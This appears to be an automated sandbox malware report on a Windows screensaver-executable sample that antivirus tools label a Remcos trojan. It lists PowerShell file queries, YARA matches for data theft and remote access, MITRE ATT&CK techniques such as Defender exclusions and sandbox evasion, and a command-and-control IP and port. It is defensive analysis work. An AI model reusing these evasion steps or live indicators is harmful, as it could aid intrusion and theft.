              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 4916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 3564, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 4916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 3564, type: MEMORYSTR
              MITRE ATT&CK matrix, by tactic (the number in parentheses is the count badge shown next to a matched technique; techniques without a number were not matched):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
              Execution: Windows Management Instrumentation (11); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
              Persistence: Registry Run Keys / Startup Folder (2); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (2); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (131); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (21); Software Packing (22); Timestomp (1); DLL Side-Loading (1)
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
              Discovery: Security Software Discovery (211); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13); Remote System Discovery; System Owner/User Discovery; Network Sniffing
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
              Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
              Command and Control: Encrypted Channel (1); Non-Standard Port (1); Application Layer Protocol (1); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
              Behavior Graph ID: 1566987
              Sample: THITWNSEI241129080897867564...
              Startdate: 02/12/2024
              Architecture: WINDOWS
              Score: 100
              Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures

              Process tree (recovered from the behavior graph):
              THITWNSEI24112908089786756456545346568789-00010.scr.exe (started)
                  Dropped file: THITWNSEI241129080...9-00010.scr.exe.log, ASCII
                  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
                  THITWNSEI24112908089786756456545346568789-00010.scr.exe (started)
                      Network: 104.250.180.178, 49770, 7061 (M247GB, United States)
                      Dropped file: C:\Users\user\AppData\Roaming\XClient.exe, PE32
                      Signatures: Adds a directory exclusion to Windows Defender
                      powershell.exe (started, four instances)
                          Signatures: Loading BitLocker PowerShell Module
                          conhost.exe (started, one per powershell.exe instance)

              Source | Detection | Scanner | Label | Link
              THITWNSEI24112908089786756456545346568789-00010.scr.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |
              THITWNSEI24112908089786756456545346568789-00010.scr.exe | 100% | Avira | HEUR/AGEN.1309499 |
              THITWNSEI24112908089786756456545346568789-00010.scr.exe | 100% | Joe Sandbox ML | |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Roaming\XClient.exe | 100% | Avira | HEUR/AGEN.1309499 |
              C:\Users\user\AppData\Roaming\XClient.exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Roaming\XClient.exe | 45% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |

              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              http://crl.miSt | 0% | Avira URL Cloud | safe |
              http://crl.microR | 0% | Avira URL Cloud | safe |
              No contacted domains info
              Name | Malicious | Antivirus Detection | Reputation
              104.250.180.178 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2221643363.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2262886255.0000000005319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2315451804.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | powershell.exe, 00000007.00000002.2268207610.0000000006C99000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000004.00000002.2215062387.0000000004E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.0000000004406000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmp | false | | high
